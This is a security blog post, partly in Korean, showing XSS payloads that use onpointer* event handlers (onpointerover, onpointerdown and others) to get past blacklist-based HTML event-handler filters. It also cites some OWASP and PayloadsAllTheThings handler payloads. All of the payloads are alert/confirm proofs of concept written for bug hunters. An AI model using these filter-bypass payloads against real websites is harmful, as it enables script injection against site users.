onpoint* XSS Payload for bypass blacklist base event-handler xss filter

Hi hackers.
I crafted XSS payloads for bypass event handler protection. it is just simple code.

onpoint* is an event handler for pointing devices (such as tablets). It has actions similar to onmouse*, and it can be used for XSS protection bypass.


onpoint* 로 시작하는 이벤트 핸들러가 있는데, 동작 방식이 onmouse*와 비슷하며 테스트 하다보니 이를 이용해서 XSS가 가능하여 블로그 글로 작성해봅니다. (TLDR만 봐도 무방..)

<div onpointerover="alert(45)">this is onpointerover=alert(45)</div>

TL;DR (XSS Payloads)

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

What is onpointer* ?

onpointer* is event handler for pointing devices.
details on https://www.w3.org/TR/pointerevents/

원래는 마우스 같은 포인팅 도구를 위한 핸들러로 알고있습니다(요게 조금 애매하긴한데..)
아무튼 사실상 포인팅 도구 또한 마우스와 어느정도 동일하다고 볼 수 있어서 트리거 하는 방식은 거의 비슷합니다. 포인터가 위에있을 때, 지나갔을 때, 움직였을 때 등등 이런 포인팅 이벤트가 발생했을 때 받아줄 수 있는 핸들러에요. 자세한 내용은 위에 링크 참고해주세요.

Event Handler of pointer

* onpointercancel
* onpointerdown
* onpointerenter
* onpointerleave
* onpointermove
* onpointerout
* onpointerover
* onpointerup
* gotpointercapture 
* lostpointercapture

onpoint* testing for xss

onpointerover
=> run mouseover

onpointerdown
=> run click

onpointerenter
=> run mouseover

onpointerleave
=> run mouseleave

onpointermove
=> run mouseleave

onpointerout
=> run mouseover

onpointerup
=> run mouseover

Valid Payload..

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

https://media.giphy.com/media/xSM46ernAUN3y/giphy.gif

Other cheatsheets

OWASP

* onAfterPrint() (activates after user prints or previews print job)
* onAfterUpdate() (activates on data object after updating data in the source object)
* onBeforeActivate() (fires before the object is set as the active element)
* onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
* onBeforeCut() (attacker executes the attack string right before a selection is cut)
* onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
* onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
* onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
* onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
* onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
* onBeforeUpdate() (activates on data object before updating data in the source object)

Payload all the things

<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>

Conclusion

Blacklist filtering based on the this(owasp,payloadallthethings) document can be bypassed because OWASP, Payload all the things, does not have this content.

Since HTML5, there are really many different event handlers and tags. A lot of testing is needed.

It’s a simple trick, but hope it helps!
happy bug hunting and security engineering.

byebye!
https://media.giphy.com/media/3orif7N2qBUUJ2hUK4/giphy.gif

Reference

https://www.w3.org/TR/pointerevents/

---

HAHWUL Security engineer, Gopher and H4cker!